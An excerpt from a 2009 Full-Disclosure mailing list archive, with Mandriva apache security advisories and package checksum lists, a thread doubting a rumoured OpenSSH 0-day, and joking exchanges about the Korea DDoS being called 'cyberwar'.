2009.1/x86_64/apache-mod_proxy_ajp-2.2.11-10.4mdv2009.1.x86_64.rpm f5353fee0655a944233e95dc542475fc 2009.1/x86_64/apache-mod_ssl-2.2.11-10.4mdv2009.1.x86_64.rpm 181766999217f26744e0b2a7179f074c 2009.1/x86_64/apache-modules-2.2.11-10.4mdv2009.1.x86_64.rpm 9c75cd439b962a013d0a12be52eac839 2009.1/x86_64/apache-mod_userdir-2.2.11-10.4mdv2009.1.x86_64.rpm 5ff7131c77436bd966c50618a23fac1f 2009.1/x86_64/apache-mpm-event-2.2.11-10.4mdv2009.1.x86_64.rpm 2df4ee8eff3152a1c12fdfec6d09a4c7 2009.1/x86_64/apache-mpm-itk-2.2.11-10.4mdv2009.1.x86_64.rpm 3e2e9c63c293ac81654e2792d941a8e5 2009.1/x86_64/apache-mpm-peruser-2.2.11-10.4mdv2009.1.x86_64.rpm db758092a06528c21fe8cb89dc72e44a 2009.1/x86_64/apache-mpm-prefork-2.2.11-10.4mdv2009.1.x86_64.rpm fbd4fa29c8e7fab05e6cd9ee73061e53 2009.1/x86_64/apache-mpm-worker-2.2.11-10.4mdv2009.1.x86_64.rpm 2a3aa46f4a5ef9eb0f4fc60b8688b6d4 2009.1/x86_64/apache-source-2.2.11-10.4mdv2009.1.x86_64.rpm 6e8db38ec06bfd8756037dec8ea71ca4 2009.1/SRPMS/apache-2.2.11-10.4mdv2009.1.src.rpm Corporate 3.0: efc4dd61f307ba7ca3e78b702d14766a corporate/3.0/i586/apache2-2.0.48-6.21.C30mdk.i586.rpm 85ef73c40780432a49b5b52eaa10174c corporate/3.0/i586/apache2-common-2.0.48-6.21.C30mdk.i586.rpm f8668cb4d5d5a7aeeec18ac9089ce224 corporate/3.0/i586/apache2-devel-2.0.48-6.21.C30mdk.i586.rpm 9c7411c194f42dc2dda22e73b87871ac corporate/3.0/i586/apache2-manual-2.0.48-6.21.C30mdk.i586.rpm addfed70aa6f5b9b95423166a9d9d2d0 corporate/3.0/i586/apache2-mod_cache-2.0.48-6.21.C30mdk.i586.rpm 23d16c62736006e63f2290c6474a3c3f corporate/3.0/i586/apache2-mod_dav-2.0.48-6.21.C30mdk.i586.rpm 4c91c64f68bf7ee1381ba571363ff18b corporate/3.0/i586/apache2-mod_deflate-2.0.48-6.21.C30mdk.i586.rpm 2e62901ddf70ec979ac1c31965817d5b corporate/3.0/i586/apache2-mod_disk_cache-2.0.48-6.21.C30mdk.i586.rpm c98277bc893e194a4cfcc6ee2efddcb9 corporate/3.0/i586/apache2-mod_file_cache-2.0.48-6.21.C30mdk.i586.rpm 76a73eae916527a461e48f535ac92cff corporate/3.0/i586/apache2-mod_ldap-2.0.48-6.21.C30mdk.i586.rpm e2b217645c51bcecb6bade3230a2eda2 corporate/3.0/i586/apache2-mod_mem_cache-2.0.48-6.21.C30mdk.i586.rpm f0ba56775f6d0a1cdc99c897d0b0a619 corporate/3.0/i586/apache2-mod_proxy-2.0.48-6.21.C30mdk.i586.rpm 29e2b0644b85e489935f195334820f61 corporate/3.0/i586/apache2-mod_ssl-2.0.48-6.21.C30mdk.i586.rpm 77836bdb2fca0e05208e44dc7ad8742e corporate/3.0/i586/apache2-modules-2.0.48-6.21.C30mdk.i586.rpm 74ba9e4ba64d33c863919363ab295e62 corporate/3.0/i586/apache2-source-2.0.48-6.21.C30mdk.i586.rpm 943e2a0c5fcff6dfc142ff52ba3286eb corporate/3.0/i586/libapr0-2.0.48-6.21.C30mdk.i586.rpm b7bdb08234711c39badc0dc000ca3d20 corporate/3.0/SRPMS/apache2-2.0.48-6.21.C30mdk.src.rpm Corporate 3.0/X86_64: b857a73720d5645127010c91e039a630 corporate/3.0/x86_64/apache2-2.0.48-6.21.C30mdk.x86_64.rpm e6e5eca1cadb862b47804cc09a3bd2b4 corporate/3.0/x86_64/apache2-common-2.0.48-6.21.C30mdk.x86_64.rpm f99582e97f0987e4b0be6add27723183 corporate/3.0/x86_64/apache2-devel-2.0.48-6.21.C30mdk.x86_64.rpm 44072cb59097737b3c00f5e8298ed89b corporate/3.0/x86_64/apache2-manual-2.0.48-6.21.C30mdk.x86_64.rpm 2d333f222f65952cae96754f7f21b604 corporate/3.0/x86_64/apache2-mod_cache-2.0.48-6.21.C30mdk.x86_64.rpm 0f5fa126d97dd1edc543a5b5de96c6e7 corporate/3.0/x86_64/apache2-mod_dav-2.0.48-6.21.C30mdk.x86_64.rpm 555b2aedd6de7fb706995fb59fa6b4f3 corporate/3.0/x86_64/apache2-mod_deflate-2.0.48-6.21.C30mdk.x86_64.rpm 1541273d263d9bda5e5eafeba7861e0c corporate/3.0/x86_64/apache2-mod_disk_cache-2.0.48-6.21.C30mdk.x86_64.rpm 295ef0b46ea5949fa0af116042936556 corporate/3.0/x86_64/apache2-mod_file_cache-2.0.48-6.21.C30mdk.x86_64.rpm 0dd4ae154c12f557a71448b5bdb42479 corporate/3.0/x86_64/apache2-mod_ldap-2.0.48-6.21.C30mdk.x86_64.rpm b93220ceeae20d88f4ae73182b9e72e6 corporate/3.0/x86_64/apache2-mod_mem_cache-2.0.48-6.21.C30mdk.x86_64.rpm 97dc6100022a85442ac7dd7da01fae34 corporate/3.0/x86_64/apache2-mod_proxy-2.0.48-6.21.C30mdk.x86_64.rpm acb4b5e5955d42cca93d1ebec2328b23 corporate/3.0/x86_64/apache2-mod_ssl-2.0.48-6.21.C30mdk.x86_64.rpm 1af23190753541fe7d24f9bd85f57b1d corporate/3.0/x86_64/apache2-modules-2.0.48-6.21.C30mdk.x86_64.rpm 305ee3ac2af4c6ef4db046ecb3dd98ec corporate/3.0/x86_64/apache2-source-2.0.48-6.21.C30mdk.x86_64.rpm e35e16fc12456a824a9e85dcfc9dbf0c corporate/3.0/x86_64/lib64apr0-2.0.48-6.21.C30mdk.x86_64.rpm b7bdb08234711c39badc0dc000ca3d20 corporate/3.0/SRPMS/apache2-2.0.48-6.21.C30mdk.src.rpm Corporate 4.0: b9d526a415d82322c308912f97e4f1ae corporate/4.0/i586/apache-base-2.2.3-1.7.20060mlcs4.i586.rpm a31613a66362403a6352d52047836e30 corporate/4.0/i586/apache-devel-2.2.3-1.7.20060mlcs4.i586.rpm dce72691c79bba01ee313fc378b36eb9 corporate/4.0/i586/apache-htcacheclean-2.2.3-1.7.20060mlcs4.i586.rpm b7937f4ef06f280f749c1fe5b7af10d2 corporate/4.0/i586/apache-mod_authn_dbd-2.2.3-1.7.20060mlcs4.i586.rpm 24ead4ff2d81737dcac9d625cdd5aaae corporate/4.0/i586/apache-mod_cache-2.2.3-1.7.20060mlcs4.i586.rpm e1f31a31c845ef295ad5122a78ea3650 corporate/4.0/i586/apache-mod_dav-2.2.3-1.7.20060mlcs4.i586.rpm 5ab10d768e463ae55838d347ec245102 corporate/4.0/i586/apache-mod_dbd-2.2.3-1.7.20060mlcs4.i586.rpm 9b6b94cdeb55e147c7634297761990a0 corporate/4.0/i586/apache-mod_deflate-2.2.3-1.7.20060mlcs4.i586.rpm b1690a889bf2babfc911a2d600eb5081 corporate/4.0/i586/apache-mod_disk_cache-2.2.3-1.7.20060mlcs4.i586.rpm 7f6bf2cfb1500cc55c3a195cc2b87a84 corporate/4.0/i586/apache-mod_file_cache-2.2.3-1.7.20060mlcs4.i586.rpm 6a57c241fab6d850ba46fc232132b2e0 corporate/4.0/i586/apache-mod_ldap-2.2.3-1.7.20060mlcs4.i586.rpm cf6a260d57b93c8e9bfe6fcbb97cb69a corporate/4.0/i586/apache-mod_mem_cache-2.2.3-1.7.20060mlcs4.i586.rpm 6a92e7840ff05818cca56ed1ee96df62 corporate/4.0/i586/apache-mod_proxy-2.2.3-1.7.20060mlcs4.i586.rpm f179ca37d885c3aaca4669a6173eb0c0 corporate/4.0/i586/apache-mod_proxy_ajp-2.2.3-1.7.20060mlcs4.i586.rpm 52a7784816d6b4808a21e87990b40c70 corporate/4.0/i586/apache-mod_ssl-2.2.3-1.7.20060mlcs4.i586.rpm cdc4728fba27771d29728f1b1678d309 corporate/4.0/i586/apache-modules-2.2.3-1.7.20060mlcs4.i586.rpm cc4ca804e4fa51f7c4131ad16902ab9d corporate/4.0/i586/apache-mod_userdir-2.2.3-1.7.20060mlcs4.i586.rpm bdee23bef1375ecbd47aeab1bdc9ed91 corporate/4.0/i586/apache-mpm-prefork-2.2.3-1.7.20060mlcs4.i586.rpm 449dfc068e06df184de8d36159b84765 corporate/4.0/i586/apache-mpm-worker-2.2.3-1.7.20060mlcs4.i586.rpm b5bd6a5ed078c35805b4ec2d9a788a79 corporate/4.0/i586/apache-source-2.2.3-1.7.20060mlcs4.i586.rpm f206539ed9c3497f21f26a758d3403b4 corporate/4.0/SRPMS/apache-2.2.3-1.7.20060mlcs4.src.rpm Corporate 4.0/X86_64: 15ae114c8d2959ef5c6486029404f689 corporate/4.0/x86_64/apache-base-2.2.3-1.7.20060mlcs4.x86_64.rpm 5198dcd3060de93577812740087fbc8d corporate/4.0/x86_64/apache-devel-2.2.3-1.7.20060mlcs4.x86_64.rpm 93d6afa11a57e157a53716ccf16cf0ef corporate/4.0/x86_64/apache-htcacheclean-2.2.3-1.7.20060mlcs4.x86_64.rpm bc92cde6ea8b747d34f0a6ad5ac9e680 corporate/4.0/x86_64/apache-mod_authn_dbd-2.2.3-1.7.20060mlcs4.x86_64.rpm 7d08b4692a1e5ba32ffef6d734b96bcc corporate/4.0/x86_64/apache-mod_cache-2.2.3-1.7.20060mlcs4.x86_64.rpm 87fc6d219c07f01a7f201f6bf413ff67 corporate/4.0/x86_64/apache-mod_dav-2.2.3-1.7.20060mlcs4.x86_64.rpm feecfa18e01f0f03a262ea490fb0830f corporate/4.0/x86_64/apache-mod_dbd-2.2.3-1.7.20060mlcs4.x86_64.rpm 85a108666e4130d3a6b4fa0fed100aba corporate/4.0/x86_64/apache-mod_deflate-2.2.3-1.7.20060mlcs4.x86_64.rpm a2d85bb6cd3d31c0d96f0fec454f2576 corporate/4.0/x86_64/apache-mod_disk_cache-2.2.3-1.7.20060mlcs4.x86_64.rpm e4027426a6dbfab2cb26e71266609ad3 corporate/4.0/x86_64/apache-mod_file_cache-2.2.3-1.7.20060mlcs4.x86_64.rpm 29df20ff497abe06723103fb5bdf5411 corporate/4.0/x86_64/apache-mod_ldap-2.2.3-1.7.20060mlcs4.x86_64.rpm fcae351832eaa3be0ee81bd1032a0ad2 corporate/4.0/x86_64/apache-mod_mem_cache-2.2.3-1.7.20060mlcs4.x86_64.rpm 704b87767aa6fbb279cc8f755650af82 corporate/4.0/x86_64/apache-mod_proxy-2.2.3-1.7.20060mlcs4.x86_64.rpm 544cf4f5cc0a9fafb62acb6808f44540 corporate/4.0/x86_64/apache-mod_proxy_ajp-2.2.3-1.7.20060mlcs4.x86_64.rpm b39cdcbc90bedfa443356c37451808c0 corporate/4.0/x86_64/apache-mod_ssl-2.2.3-1.7.20060mlcs4.x86_64.rpm f3d517adf5a4ce033d8d067fc6b14955 corporate/4.0/x86_64/apache-modules-2.2.3-1.7.20060mlcs4.x86_64.rpm c6c9c109cb6a41d52e702807e9704929 corporate/4.0/x86_64/apache-mod_userdir-2.2.3-1.7.20060mlcs4.x86_64.rpm 3bf40c38ea6c6afb5d75b02e9425cbfc corporate/4.0/x86_64/apache-mpm-prefork-2.2.3-1.7.20060mlcs4.x86_64.rpm 737c7f37638e53faf7cc269d6f197c2d corporate/4.0/x86_64/apache-mpm-worker-2.2.3-1.7.20060mlcs4.x86_64.rpm 9c793d83ccec6978fc1de8106ad05595 corporate/4.0/x86_64/apache-source-2.2.3-1.7.20060mlcs4.x86_64.rpm f206539ed9c3497f21f26a758d3403b4 corporate/4.0/SRPMS/apache-2.2.3-1.7.20060mlcs4.src.rpm Multi Network Firewall 2.0: 55005338af9c4480caac9ffa86623264 mnf/2.0/i586/apache2-2.0.48-6.21.C30mdk.i586.rpm 1263d183c09bcf57234a8f91de009e6b mnf/2.0/i586/apache2-common-2.0.48-6.21.C30mdk.i586.rpm a5650d1b998d0e5b383d5ce47aa55433 mnf/2.0/i586/apache2-devel-2.0.48-6.21.C30mdk.i586.rpm d8b95b26cb53876fc299a64f1262b7db mnf/2.0/i586/apache2-manual-2.0.48-6.21.C30mdk.i586.rpm 69ac5aeed2fd42c52ce4f09fc5b70d62 mnf/2.0/i586/apache2-mod_cache-2.0.48-6.21.C30mdk.i586.rpm b6748d917602b92ea097129b317a5366 mnf/2.0/i586/apache2-mod_dav-2.0.48-6.21.C30mdk.i586.rpm 950d5f9f1710a0b3f9071cd4adfaa28b mnf/2.0/i586/apache2-mod_deflate-2.0.48-6.21.C30mdk.i586.rpm 4885836db49da3bbcb31f1b1769c14d4 mnf/2.0/i586/apache2-mod_disk_cache-2.0.48-6.21.C30mdk.i586.rpm cf58f6eb5f73b9ea4f9d11132cda42db mnf/2.0/i586/apache2-mod_file_cache-2.0.48-6.21.C30mdk.i586.rpm 06d5bb0f4c027b27642ff5c5eade19a2 mnf/2.0/i586/apache2-mod_ldap-2.0.48-6.21.C30mdk.i586.rpm 4c76e76cea72d3449aceaf8ce91c6f44 mnf/2.0/i586/apache2-mod_mem_cache-2.0.48-6.21.C30mdk.i586.rpm 7b47e45702c799d496524b58b1128aaf mnf/2.0/i586/apache2-mod_proxy-2.0.48-6.21.C30mdk.i586.rpm 19f0e35da2f28563cb11136ea7dfeee7 mnf/2.0/i586/apache2-mod_ssl-2.0.48-6.21.C30mdk.i586.rpm 940dbdedd9567b10414164a0d06e9898 mnf/2.0/i586/apache2-modules-2.0.48-6.21.C30mdk.i586.rpm 3fac4349b9d5c061a0f83c16935eef8c mnf/2.0/i586/apache2-source-2.0.48-6.21.C30mdk.i586.rpm 1306a508a996ed429b1f022dca2890ec mnf/2.0/i586/libapr0-2.0.48-6.21.C30mdk.i586.rpm 0640552aaad9af58f8f0dc97a2aaf6e9 mnf/2.0/SRPMS/apache2-2.0.48-6.21.C30mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFKVfgomqjQ0CJFipgRAuG7AJwNjHQS8BRukgf6jx7cwo7hVBjiFACgx/bp cfmKStVOUmNQurlGpWWJe3I= =g8pO -----END PGP SIGNATURE----- From charles.lists at gmail.com Thu Jul 9 16:11:08 2009 From: charles.lists at gmail.com (Charles Majola) Date: Thu, 9 Jul 2009 17:11:08 +0200 Subject: [Full-disclosure] [Rumor] SSH 0-day In-Reply-To: <8a6b8e350907090755r6edd8fd2n14ed68e477ae2a22@mail.gmail.com> References: <20090709094601.240530@gmx.com> <8a6b8e350907090755r6edd8fd2n14ed68e477ae2a22@mail.gmail.com> Message-ID: <2352f85c0907090811o3fe34ceby5256a35eb8726016@mail.gmail.com> >From the LWN article (OpenSSH maintainer Damien Miller), its probably not real, well just have to wait and see On Thu, Jul 9, 2009 at 4:55 PM, James Matthews wrote: > > I am worried that if it is an OpenSSH 0day how much damage should I expect. However SANS doesn't seem to think it's real. > > James > > On Thu, Jul 9, 2009 at 12:46 PM, Kaspar Mendev wrote: >> >> See also their update http://isc.sans.org/diary.html?storyid=6760 >> >> Though like frank^2 says, we'll see what we'll see. >> >> ----- Original Message ----- >> >> From: frank^2 >> >> Sent: 07/09/09 01:09 am >> >> To: Anderson Kaiser >> >> Subject: Re: [Full-disclosure] [Rumor] SSH 0-day >> >> >> >> On Wed, Jul 8, 2009 at 1:58 PM, Anderson Kaiser wrote: >> > 2009/7/8 Martin Spinassi : >> >> Hi list, >> >> >> >> >> >> I've been reading around (openssh mailing list, some forums, etc.) a >> >> rumor about a 0-day exploit in openssh. Does anybody knows if there is >> >> *really* something like this in the wild? >> >> >> >> >> >> Cheers >> >> >> >> >> >> Martin >> >> >> > >> > This attack sounds more like a brute-force attack than a 0-day. You >> > can see it in the original post. >> >> There's also the ominous anonymous comment left by a fellow on a blog: >> http://isc.sans.org/diary.html?storyid=6742 >> >> The significant stuff: "Expect the SSH exploit to be made public >> before BH/DC. I have proof that I can't share (sorry), that this >> exploit does exist, does not work against current versions of SSH, and >> is actively being used by members of the anti-sec movement." >> >> Signs seem to be pointing to hoax, old exploit or non-exploit, though. >> Unfortunately there's really not quite enough information to make an >> assessment yet, IMHO. >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> >> >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > > > > -- > http://www.goldwatches.com > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From martin.elrod at antagus.de Thu Jul 9 16:11:32 2009 From: martin.elrod at antagus.de (martin) Date: Thu, 09 Jul 2009 17:11:32 +0200 Subject: [Full-disclosure] ssh 0day Message-ID: <4A5608A4.7020505@antagus.de> James Matthews wrote: > I am worried that if it is an OpenSSH 0day how much damage should I > expect. However SANS doesn't seem to think it's real. > With a little bit of preparation you can avoid the biggest harm, the portknocking technic should help you. http://www.portknocking.org/ is a nice resource. happy hacking From ge at linuxbox.org Thu Jul 9 16:25:32 2009 From: ge at linuxbox.org (Gadi Evron) Date: Thu, 09 Jul 2009 18:25:32 +0300 Subject: [Full-disclosure] can someone please try and explain to me.... Message-ID: <4A560BEC.9050101@linuxbox.org> Why people call this so-called Korea DDoS a cyber war? Don't people know how the Internet works yet? Gadi. -- Gadi Evron, ge at linuxbox.org. Blog: http://gevron.livejournal.com/ From kevin at tux.appstate.edu Thu Jul 9 16:46:11 2009 From: kevin at tux.appstate.edu (Kevin Wilcox) Date: Thu, 9 Jul 2009 11:46:11 -0400 Subject: [Full-disclosure] [Rumor] SSH 0-day In-Reply-To: <5d6848b00907090833x8c53432g857dc7bfbf87c401@mail.gmail.com> References: <20090709094601.240530@gmx.com> <8a6b8e350907090755r6edd8fd2n14ed68e477ae2a22@mail.gmail.com> <2352f85c0907090811o3fe34ceby5256a35eb8726016@mail.gmail.com> <5d6848b00907090833x8c53432g857dc7bfbf87c401@mail.gmail.com> Message-ID: <5d6848b00907090846n2566084csf5814ac8c8e684ae@mail.gmail.com> 2009/7/9 Charles Majola : > >From the LWN article (OpenSSH maintainer Damien Miller), its probably > not real, well just have to wait and see Agreed. Even if you *do* believe the secer site, look at the particulars. It's a brute force. Properly configure your ssh servers (including rate-limiting, possibly port knocking, key based authentication and user at host allow statements) and file this under a non-issue. Of course this is all theoretical so far so I suppose everyone is free to wring their hands and gnash their teeth as much as they wish over this. Original CC recipients cut because I'm the guy that can't remember which addresses are subscribed to which lists. kmw -- To take from one, because it is thought that his own industry and that of his fathers has acquired too much, in order to spare to others, who, or whose fathers have not exercised equal industry and skill, is to violate arbitrarily the first principle of association, ?the guarantee to every one of a free exercise of his industry, & the fruits acquired by it.' From a.kuriger at liquidphlux.com Thu Jul 9 16:41:12 2009 From: a.kuriger at liquidphlux.com (Andrew Kuriger) Date: Thu, 9 Jul 2009 10:41:12 -0500 (CDT) Subject: [Full-disclosure] can someone please try and explain to me.... In-Reply-To: <4A560BEC.9050101@linuxbox.org> Message-ID: Mainly because it sells and has a higher "shock" value to it. Its all about getting hits on your website to sell more advertising to make more money. Its always been about the money. ~A On 7/9/2009, "Gadi Evron" wrote: >Why people call this so-called Korea DDoS a cyber war? Don't people know >how the Internet works yet? > > Gadi. > > > >-- >Gadi Evron, >ge at linuxbox.org. > >Blog: http://gevron.livejournal.com/ > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ From foofus at foofus.net Thu Jul 9 16:56:22 2009 From: foofus at foofus.net (foofus at foofus.net) Date: Thu, 9 Jul 2009 08:56:22 -0700 Subject: [Full-disclosure] can someone please try and explain to me.... In-Reply-To: <4A560BEC.9050101@linuxbox.org> References: <4A560BEC.9050101@linuxbox.org> Message-ID: > Why people call this so-called Korea DDoS a cyber war? Don't people know > how the Internet works yet? The problem isn't that people fail to understand how the Internet works (they do fail at this, but that's not the problem). The problem is how exciting it is to use terms like "cyberwar." In the words of a prominent researcher: if [people shouting "cyberwar"] want to be taken seriously, they need to start releasing proof to the mailing lists and name specific intelligence agency's who are conducting the Cyberwar. I don't think there is a cyberwar, there will be intelligencers probing the networks for secrets, thats not a cyberwar. Cyberwar is something completely different [...] Cyberwar *could* be real, *look at this*. Although the truth is, we haven't seen a Cyberwar yet, it's still in the imaginary dream book stage. Regardless of one's understanding of the Internet, getting to say "cyberwar" is just too tempting for lots of people to resist. --Foofus. From gec at hushmail.me Thu Jul 9 17:03:22 2009 From: gec at hushmail.me (Gadi Evron's Cholesterol) Date: Thu, 09 Jul 2009 12:03:22 -0400 Subject: [Full-disclosure] can someone please try and explain to me.... Message-ID: <20090709160322.EAD09B0047@smtp.hushmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 How in fact does the Internet work? On Thu, 09 Jul 2009 11:25:32 -0400 Gadi Evron wrote: >Why people call this so-called Korea DDoS a cyber war? Don't >people know >how the Internet works yet? > > Gadi. > > > >-- >Gadi Evron, >ge at linuxbox.org. > >Blog: http://gevron.livejournal.com/ > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ -----BEGIN PGP SIGNATURE----- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAkpWFMoACgkQwyeJOWeOiwUm5QP/V8nMNQQwqwDtub3WXMVki0q+Xz6W L9iYor/C99UrWchX/0QpVCOv9ojZtDuXljpE/UmGDCJ3QNkJ5m5Y9I2DnV4IBMo7y2n6 J+ABZmOGIQMdIaafPCZO2NcSDddqQTuJWl6Tphcb09F4pIgXo1kM26pJFoCsiR8LZZGz 9dDtET8= =H4Mm -----END PGP SIGNATURE----- -- Save on a home Heating and Cooling System. Click Now! http://tagline.hushmail.com/fc/BLSrjkqbxqsXPGyRAzMCjr191qWYl8GTOPdPWfpKdHNwdwxQ61yonFP6d7C/ From a.kuriger at liquidphlux.com Thu Jul 9 17:42:02 2009 From: a.kuriger at liquidphlux.com (Andrew Kuriger) Date: Thu, 9 Jul 2009 11:42:02 -0500 (CDT) Subject: [Full-disclosure] can someone please try and explain to me.... In-Reply-To: <20090709160322.EAD09B0047@smtp.hushmail.com> Message-ID: Ted Stevens sums it up pretty well: "They want to deliver vast amounts of information over the Internet. And again, the Internet is not something that you just dump something on. It's not a big truck. It's a series of tubes. And if you don't understand, those tubes can be filled and if they are filled, when you put your message in, it gets in line and it's going to be delayed by anyone that puts into that tube enormous amounts of material, enormous amounts of material." So as you see, its just a series of tubes, something like how you deposit/withdraw cash from a drive up bank teller. ;-) ~A On 7/9/2009, "Gadi Evron's Cholesterol" wrote: >-----BEGIN PGP SIGNED MESSAGE----- >Hash: SHA1 > >How in fact does the Internet work? > >On Thu, 09 Jul 2009 11:25:32 -0400 Gadi Evron >wrote: >>Why people call this so-called Korea DDoS a cyber war? Don't >>people know >>how the Internet works yet? >> >> Gadi. >> >> >> >>-- >>Gadi Evron, >>ge at linuxbox.org. >> >>Blog: http://gevron.livejournal.com/ >> >>_______________________________________________ >>Full-Disclosure - We believe in it. >>Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>Hosted and sponsored by Secunia - http://secunia.com/ >-----BEGIN PGP SIGNATURE----- >Charset: UTF8 >Version: Hush 3.0 >Note: This signature can be verified at https://www.hushtools.com/verify > >wpwEAQMCAAYFAkpWFMoACgkQwyeJOWeOiwUm5QP/V8nMNQQwqwDtub3WXMVki0q+Xz6W >L9iYor/C99UrWchX/0QpVCOv9ojZtDuXljpE/UmGDCJ3QNkJ5m5Y9I2DnV4IBMo7y2n6 >J+ABZmOGIQMdIaafPCZO2NcSDddqQTuJWl6Tphcb09F4pIgXo1kM26pJFoCsiR8LZZGz >9dDtET8= >=H4Mm >-----END PGP SIGNATURE----- > >-- >Save on a home Heating and Cooling System. Click Now! > http://tagline.hushmail.com/fc/BLSrjkqbxqsXPGyRAzMCjr191qWYl8GTOPdPWfpKdHNwdwxQ61yonFP6d7C/ > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ From security at mandriva.com Thu Jul 9 18:01:01 2009 From: security at mandriva.com (security at mandriva.com) Date: Thu, 09 Jul 2009 19:01:01 +0200 Subject: [Full-disclosure] [ MDVSA-2009:149 ] apache Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:149 http://www.mandriva.com/security/ _______________________________________________________________________ Package : apache Date : July 9, 2009 Affected: 2008.1, 2009.0, 2009.1, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0 _______________________________________________________________________ Problem Description: Multiple vulnerabilities has been found and corrected in apache: The stream_reqbody_cl function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server before 2.3.3, when a reverse proxy is configured, does not properly handle an amount of streamed data that exceeds the Content-Length value, which allows remote attackers to cause a denial of service (CPU consumption) via crafted requests (CVE-2009-1890). Fix a potential Denial-of-Service attack against mod_deflate or other modules, by forcing the server to consume CPU time in compressing a large file after a client disconnects (CVE-2009-1891). This update provides fixes for these vulnerabilities. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1890 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1891 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.1: 864257e773e8847901aa0f2e7b92e35c 2008.1/i586/apache-base-2.2.8-6.5mdv2008.1.i586.rpm 2ef1924cb3803af418dcb0e12b05da5a 2008.1/i586/apache-devel-2.2.8-6.5mdv2008.1.i586.rpm a3ec4a3eda586d7b52e65e0dc715e96b 2008.1/i586/apache-htcacheclean-2.2.8-6.5mdv2008.1.i586.rpm ad46ee6bd081b35e89bf00b707e34e66 2008.1/i586/apache-mod_authn_dbd-2.2.8-6.5mdv2008.1.i586.rpm 1500f492f8aa95f82ce8062fb79371bf 2008.1/i586/apache-mod_cache-2.2.8-6.5mdv2008.1.i586.rpm 0bcf1f2cc7c220a5fcbe212e8d4c791a 2008.1/i586/apache-mod_dav-2.2.8-6.5mdv2008.1.i586.rpm f50830d873e8a948ebb7435068ac7723 2008.1/i586/apache-mod_dbd-2.2.8-6.5mdv2008.1.i586.rpm 53e657db85cbbb5a46991b7a7e7ba6eb 2008.1/i586/apache-mod_deflate-2.2.8-6.5mdv2008.1.i586.rpm 0de02351654d1691aca8027fcd162076 2008.1/i586/apache-mod_disk_cache-2.2.8-6.5mdv2008.1.i586.rpm 9b8cb72ea384949d1afdb2a458edde43 2008.1/i586/apache-mod_file_cache-2.2.8-6.5mdv2008.1.i586.rpm b01299df82912bd055e8a4a5107f18ba 2008.1/i586/apache-mod_ldap-2.2.8-6.5mdv2008.1.i586.rpm de8b3be73e223946bc59267b2b061041 2008.1/i586/apache-mod_mem_cache-2.2.8-6.5mdv2008.1.i586.rpm f8d35075b25dfa8349e1a4903d17751b 2008.1/i586/apache-mod_proxy-2.2.8-6.5mdv2008.1.i586.rpm 0c16a26c9c164197211a13c4ffcc3b33 2008.1/i586/apache-mod_proxy_ajp-2.2.8-6.5mdv2008.1.i586.rpm d70ff82e41072270e0f6af937d06ee9b 2008.1/i586/apache-mod_ssl-2.2.8-6.5mdv2008.1.i586.rpm 05c16bce9cefcb99c1db3834f6853f89 2008.1/i586/apache-modules-2.2.8-6.5mdv2008.1.i586.rpm 8e3ee38379f1e301a1e41a489a92147b 2008.1/i586/apache-mod_userdir-2.2.8-6.5mdv2008.1.i586.rpm a3ff073681b969b46638ff46a6313fc6 2008.1/i586/apache-mpm-event-2.2.8-6.5mdv2008.1.i586.rpm c89bb0192cc036054e3a4367fababce1 2008.1/i586/apache-mpm-itk-2.2.8-6.5mdv2008.1.i586.rpm 410f034dd2818b264a09a036bd35f9a2 2008.1/i586/apache-mpm-prefork-2.2.8-6.5mdv2008.1.i586.rpm 476303bf479cc1c249b6fa69f32742d2 2008.1/i586/apache-mpm-worker-2.2.8-6.5mdv2008.1.i586.rpm 23ef5826c0e49f577d8d04254f61a923 2008.1/i586/apache-source-2.2.8-6.5mdv2008.1.i586.rpm 5d895c7c364db08fff0372c3654d1ccd 2008.1/SRPMS/apache-2.2.8-6.5mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: ed8541532eb77b813ec71f35bc3b1a7f 2008.1/x86_64/apache-base-2.2.8-6.5mdv2008.1.x86_64.rpm 98000923f5eec7c767dafd94ab0967bc 2008.1/x86_64/apache-devel-2.2.8-6.5mdv2008.1.x86_64.rpm 7c81d6ed41e96370e3c4498a6a082714 2008.1/x86_64/apache-htcacheclean-2.2.8-6.5mdv2008.1.x86_64.rpm 074ce4664eb6fc96f0444de96bdd17cf 2008.1/x86_64/apache-mod_authn_dbd-2.2.8-6.5mdv2008.1.x86_64.rpm 8306c6084cabfd7e36207a53489093df 